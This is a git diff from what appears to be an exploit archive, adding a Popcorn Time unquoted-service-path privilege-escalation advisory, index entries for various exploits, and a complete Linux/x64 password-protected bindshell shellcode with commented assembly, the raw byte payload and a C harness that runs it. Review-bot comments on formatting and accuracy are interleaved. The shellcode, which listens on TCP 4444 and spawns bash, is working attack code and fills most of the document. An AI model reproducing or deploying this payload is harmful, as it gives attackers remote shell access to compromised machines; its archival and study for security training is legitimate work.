@@ -0,0 +1,37 @@ +# Exploit Title: Popcorn Time 6.2 - 'Update service' Unquoted Service Path +# Date: 2020-04-24 +# Vendor Homepage: https://getpopcorntime.is +# Exploit Authors: Uriel Yochpaz & Jonatan Schor +# Software Link: https://dl.getpopcorntime.is/PopcornTime-latest.exe +# Version: 6.2.1.14 and probably prior versions +# Tested on: Windows 10, 7 +# CVE : N/A + +[+] Description: +Popcorn Time For Windows installs as a service with an unquoted +service path running with SYSTEM privileges. +This could potentially allow an authorized but non-privileged local +user to execute arbitrary code with elevated privileges on the system. + +[+] POC: +C:\Users\User>sc qc "Update service" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: Update service + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Popcorn Time\Updater.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Update service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +[+] Exploit: +A successful attempt would require the local user to be able to insert their +code in "Program files (x86)" (popcorn.exe) or "C:\" (program.exe) +folders undetected by the OS or other security applications +where it could potentially be executed during application startup or reboot. +If successful, the local user's code would execute with the elevated privileges +of the application. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 5b809e378..b1b0f9065 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
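Review bot: The author line in this hunk, `# Exploit Authors: Uriel Yochpaz & Jonatan Schor`, does not match the index row added for 48378 in files_exploits.csv in the same commit, which credits `"Uriel Yochpaz"` alone; one of the two should be corrected so the advisory and the index agree. The Exploit section says a non-privileged user would need to drop `program.exe` into `C:\` or `popcorn.exe` into `Program Files (x86)`, but by default neither location is writable by standard users, so the write-up should state that exploitability depends on weakened directory ACLs — the `sc qc` output only demonstrates the unquoted path, not the write. A remediation line, quoting the service's BINARY_PATH_NAME (`"C:\Program Files (x86)\Popcorn Time\Updater.exe"`), would make the entry useful for defenders as well.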
@@ -11038,6 +11038,7 @@ id,file,description,date,author,type,platform,port 48352,exploits/windows/local/48352.txt,"Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path",2020-04-20,boku,local,windows, 48359,exploits/solaris/local/48359.c,"Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation",2020-04-21,"Marco Ivaldi",local,solaris, 48364,exploits/windows/local/48364.py,"RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)",2020-04-22,"Felipe Winsnes",local,windows, +48378,exploits/windows/local/48378.txt,"Popcorn Time 6.2 - 'Update service' Unquoted Service Path",2020-04-24,"Uriel Yochpaz",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42611,3 +42612,6 @@ id,file,description,date,author,type,platform,port 48372,exploits/php/webapps/48372.txt,"Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)",2020-04-23,Besim,webapps,php, 48373,exploits/cgi/webapps/48373.rb,"Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)",2020-04-23,"Dhiraj Mishra",webapps,cgi, 48375,exploits/ios/webapps/48375.txt,"Sky File 2.1.0 iOS - Directory Traversal",2020-04-23,Vulnerability-Lab,webapps,ios, +48376,exploits/multiple/webapps/48376.txt,"EspoCRM 5.8.5 - Privilege Escalation",2020-04-24,Besim,webapps,multiple, +48377,exploits/hardware/webapps/48377.txt,"Edimax EW-7438RPn 1.13 - Remote Code Execution",2020-04-24,Besim,webapps,hardware, +48380,exploits/java/webapps/48380.txt,"Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution",2020-04-24,LiquidWorm,webapps,java, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index f62afe4be..e6ca9e5cc 100644 
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1020,3 +1020,4 @@ id,file,description,date,author,type,platform
 48243,shellcodes/linux/48243.txt,"Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)",2020-03-23,Upayan,shellcode,linux
 48252,shellcodes/windows_x86-64/48252.txt,"Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)",2020-03-25,boku,shellcode,windows_x86-64
 48355,shellcodes/windows/48355.c,"Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)",2020-04-21,boku,shellcode,windows
+48379,shellcodes/linux/48379.c,"Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux
diff --git a/shellcodes/linux/48379.c b/shellcodes/linux/48379.c
new file mode 100644
index 000000000..72e38e10d
--- /dev/null
+++ b/shellcodes/linux/48379.c
@@ -0,0 +1,194 @@
+## Exploit Title: Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes)
+## Exploit Author: Bobby Cooke
+## Date: 2020-04-23
+## Tested on: Linux x86_64 SMP Debian 5.3.15-1kali1
+## SLAE/Student ID: PA-10913
+## Course: This shellcode was created for the x86_64 Assembly Language and Shellcoding on Linux (SLAE64) Course offered at pentesteracademy.com.
+## Description: Dynamic, Null-free shellcode that spawns a bindshell on TCP port 4444; on all the network interfaces of the host. The bindshell is password protected. The password 'P3WP3Wl4ZerZ' must be entered before execve will spawn a bash shell for the connecting client.
+## Example:
+# user$ nc 127.0.0.1 4444
+# M@G1C WOrDz IZ??asd
+# REALLY?!M@G1C WOrDz IZ??P3WP3Wl4ZerZ
+# id
+# uid=0(root) gid=0(root) groups=0(root)
+
+; int ipv4Socket = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
+; rax = 0x29 ; rdi = 0x2 = AF_INET
+; rsi = 0x1 = SOCK_STREAM ; rdx = 0x0 = IPPROTO_IP
+xor rsi, rsi ; clear rsi
+mul rsi ; clear rax, rdx ; rdx = 0x0 = IPPROTO_IP
+add al, 0x29 ; rax = 0x29 = socket syscall
+inc rsi ; rsi = 0x1 = SOCK_STREAM
+push rsi
+pop rdi ; rdi = 0x1
+inc rdi ; rdi = 0x2 = AF_INET
+syscall ; socket syscall ; RAX returns socket File-Descriptor
+
+; bind(ipv4Socket, (struct sockaddr*) &ipSocketAddr, sizeof(ipSocketAddr));
+; rax = 0x31 ; rdi = 0x3 = ipv4Socket
+; rsi = &ipSocketAddr ; rdi = 0x10
+; 02 00 11 5c 00 00 00 00 00 00 00 00 00 00 00 00
+; Address-Family| PORT| IP Address| 8 bytes of zeros
+xchg rdi, rax ; RDI = sockfd / ipv4Socket
+xor rax, rax
+add al, 0x31 ; rax = 0x31 = socket syscall
+push rdx ; 8 bytes of zeros for second half of struct
+push dx ; 4 bytes of zeros for IPADDR_ANY
+push dx ; 4 bytes of zeros for IPADDR_ANY
+push word 0x5c11 ; push 2 bytes for TCP Port 4444
+inc rdx
+inc rdx ; rdx = 0x2 ; dx = 0x0002
+push dx ; 0x2 = AF_INET
+add dl, 0xe ; rdi = 0x10 = sizeof(ipSocketAddr)
+mov rsi, rsp ; rsi = &ipSocketAddr
+syscall
+
+; int listen(int sockfd, int backlog);
+; rax = 0x32 = listen syscall
+; rdi = sockfd = 0x3 = ipv4Socket ; rsi = backlog = 0
+xor rax, rax
+add al, 0x32 ; listen syscall
+xor rsi, rsi ; backlog = 0x0
+syscall
+
+;accept
+; rax = 0x2b ; rdi = sockfd = 0x3 = ipv4Socket
+; rsi = 0x0 ; rdx = 0x0
+xor rax, rax
+push rax
+push rax
+pop rdx
+pop rsi
+add al, 0x2b ; accept syscall
+syscall ; accept returns client socket file-descriptor in RAX
+
+; dup2
+xchg rdi, rax ; RDI = sockfd / ClientSocketFD
+xor rsi, rsi
+add dl, 0x3 ; Loop Counter
+dup2Loop:
+xor rax, rax
+add al, 0x21 ; RAX = 0x21 = dup2 systemcall
+syscall ; call dup2 x3 to redirect STDIN STDOUT STDERR
+inc rsi
+cmp rsi, rdx ; if 2-STDERR, end loop
+jne dup2Loop
+
+jmp short password
+
+failer:
+; write
+; rax = 0x1 ; rdi = fd = 0x1 STDOUT
+; rsi = &String ; rdx = sizeof(String)
+; String = "REALLY?!"
+; !?YLLAER : 213f594c4c414552
+xor rdi, rdi
+mul rdi
+push rdi
+pop rsi
+push rsi
+mov rsi, 0x213f594c4c414552
+push rsi
+mov rsi, rsp ; rsi = &String
+inc rax ; rax = 0x1 = write system call
+mov rdi, rax
+add rdx, 16 ; 16 bytes / size of string
+syscall
+
+password:
+; write
+; rax = 0x1 ; rdi = fd = 0x1 STDOUT
+; rsi = &String ; rdx = sizeof(String)
+; String = "M@G1C WOrDz IZ??"
+; ??ZI zDr : 3f3f5a49207a4472
+; OW C1G@M : 4f5720433147404d
+xor rdi, rdi
+mul rdi
+push rdi
+pop rsi
+push rsi
+mov rsi, 0x3f3f5a49207a4472 ; ??ZI zDr
+push rsi
+mov rsi, 0x4f5720433147404d ; OW C1G@M
+push rsi
+mov rsi, rsp ; rsi = &String
+inc rax ; rax = 0x1 = write system call
+mov rdi, rax
+add rdx, 16 ; 16 bytes / size of string
+syscall
+
+; read
+; rax = 0x0 = read syscall ; rdi = fd = 0x0 STDIN
+; rsi = Write to &String ; rdx = 0x12 = sizeof(String)
+xor rdi, rdi
+push rdi
+mul rdi ; rdx =0x0 ; rax = 0x0 = write system call
+mov rsi, rsp ; rsi = [RSP] = &String
+add rdx, 12 ; 12 bytes / size of password
+syscall
+
+; String = P3WP3Wl4ZerZ
+; ZreZ : 5a72655a
+; 4lW3PW3P : 346c573350573350
+mov rdi, rsp
+xor rsi, rsi
+add rsi, 0x5a72655a
+push rsi
+mov rsi, 0x346c573350573350
+push rsi
+mov rsi, rsp ; rsi = &String
+xor rcx, rcx
+add rcx, 0xB
+repe cmpsb
+jnz failer
+
+;execve
+; rax = 0x3b ; rdi = Pointer -> "/bin/bash"0x00
+; rsi = 0x0 ; rdx = 0x0
+; "/bin/bash"
+; h : 68
+; sab/nib/ : 7361622f6e69622f
+xor rsi, rsi
+mul rsi ; rdx&rax= 0x0
+xor rdi, rdi
+push rdi
+add rdx, 0x68 ; "h"
+push rdx
+mov rdx, 0x7361622f6e69622f ; "/bin/bas"
+push rdx
+xor rdx, rdx
+mov rdi, rsp
+mov al, 0x3b ; execve syscall
+syscall ; call execve("/bin/bash", NULL, NULL)
+
+################################################################################
+
+// Filename: shellcode.c
+// Compile: gcc -m64 -z execstack -fno-stack-protector shellcode.c -o shellcode
+#include
+#include
+
+unsigned char shellcode[] = \
+"\x48\x31\xf6\x48\xf7\xe6\x04\x29\x48\xff\xc6\x56\x5f\x48\xff\xc7"
+"\x0f\x05\x48\x97\x48\x31\xc0\x04\x31\x52\x66\x52\x66\x52\x66\x68"
+"\x11\x5c\x48\xff\xc2\x48\xff\xc2\x66\x52\x80\xc2\x0e\x48\x89\xe6"
+"\x0f\x05\x48\x31\xc0\x04\x32\x48\x31\xf6\x0f\x05\x48\x31\xc0\x50"
+"\x50\x5a\x5e\x04\x2b\x0f\x05\x48\x97\x48\x31\xf6\x80\xc2\x03\x48"
+"\x31\xc0\x04\x21\x0f\x05\x48\xff\xc6\x48\x39\xd6\x75\xf1\xeb\x23"
+"\x48\x31\xff\x48\xf7\xe7\x57\x5e\x56\x48\xbe\x52\x45\x41\x4c\x4c"
+"\x59\x3f\x21\x56\x48\x89\xe6\x48\xff\xc0\x48\x89\xc7\x48\x83\xc2"
+"\x10\x0f\x05\x48\x31\xff\x48\xf7\xe7\x57\x5e\x56\x48\xbe\x72\x44"
+"\x7a\x20\x49\x5a\x3f\x3f\x56\x48\xbe\x4d\x40\x47\x31\x43\x20\x57"
+"\x4f\x56\x48\x89\xe6\x48\xff\xc0\x48\x89\xc7\x48\x83\xc2\x10\x0f"
+"\x05\x48\x31\xff\x57\x48\xf7\xe7\x48\x89\xe6\x48\x83\xc2\x0c\x0f"
+"\x05\x48\x89\xe7\x48\x31\xf6\x48\x81\xc6\x5a\x65\x72\x5a\x56\x48"
+"\xbe\x50\x33\x57\x50\x33\x57\x6c\x34\x56\x48\x89\xe6\x48\x31\xc9"
+"\x48\x83\xc1\x0b\xf3\xa6\x0f\x85\x74\xff\xff\xff\x48\x31\xf6\x48"
+"\xf7\xe6\x48\x31\xff\x57\x48\x83\xc2\x68\x52\x48\xba\x2f\x62\x69"
+"\x6e\x2f\x62\x61\x73\x52\x48\x31\xd2\x48\x89\xe7\xb0\x3b\x0f\x05";
+int main()
+{
+ printf("Shellcode Length: %d\n", strlen(shellcode));
+ int (*ret)() = (int(*)())shellcode;
+ ret();
+}
\ No newline at end of file
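Review bot: The test harness at the end of the new file passes a `size_t` from `strlen()` to a `%d` conversion in `printf("Shellcode Length: %d\n", strlen(shellcode));`, which is a format/argument type mismatch (undefined behaviour, and a `-Wformat` warning); it should read `printf("Shellcode Length: %zu\n", strlen(shellcode));`. The two `#include` lines appear without header names in the diff as rendered here, presumably `<stdio.h>` and `<string.h>` lost to markup stripping — worth confirming against the committed file, since the harness will not compile without them. `int main()` with an empty parameter list and no `return` statement is also old-style; `int main(void)` with an explicit `return 0;` would match the rest of the archive's C harnesses. A one-line comment above the `strlen()` call noting that the length print relies on the payload being NUL-free (which is what makes `strlen` valid on a byte array here) would help readers of the archive.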